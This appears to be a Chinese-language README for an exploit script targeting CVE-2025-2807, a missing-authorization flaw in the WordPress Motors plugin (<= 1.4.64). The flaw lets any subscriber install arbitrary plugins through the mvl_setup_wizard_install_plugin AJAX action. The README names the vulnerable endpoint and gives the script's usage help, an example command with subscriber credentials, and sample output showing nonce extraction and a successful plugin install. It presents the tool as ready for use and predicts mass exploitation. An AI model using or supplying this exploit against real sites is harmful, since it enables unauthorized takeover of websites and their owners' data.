漏洞利用者: Nxploited | Khaled Alenazi
插件: Motors (<= 1.4.64)
类型: 授权缺失 — 已认证(订阅者+)任意插件安装
严重程度: 8.8(CVSS v3)
发现日期: 2025年4月7日
漏洞披露计划: 无
该漏洞允许任何已认证的 WordPress 用户(订阅者+) 在没有任何适当授权检查的情况下安装任意插件。
由于 mvl_setup_wizard_install_plugin 函数中缺少能力验证,低权限用户可以执行仅限管理员的操作。
📅 预计会因其简单性和严重影响而被大规模利用。
/wp-admin/admin-ajax.phpmvl_setup_wizard_install_plugincurrent_user_can('install_plugins') 或类似的能力检查该脚本:
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]
Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Subscriber username
-p, --password PASSWORD Subscriber password
-pn, --plugin PLUGIN Plugin to install (default: contact-form-7)
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7
[*] 正在登录...
[+] 登录成功。
[*] 正在获取设置向导页面...
[+] 在 HTML 中找到 nonce:428cdf8347
[*] 正在尝试安装插件:contact-form-7
[+] 插件安装请求已成功发送!
[+] 响应:{"success":true,"data":"插件成功激活"}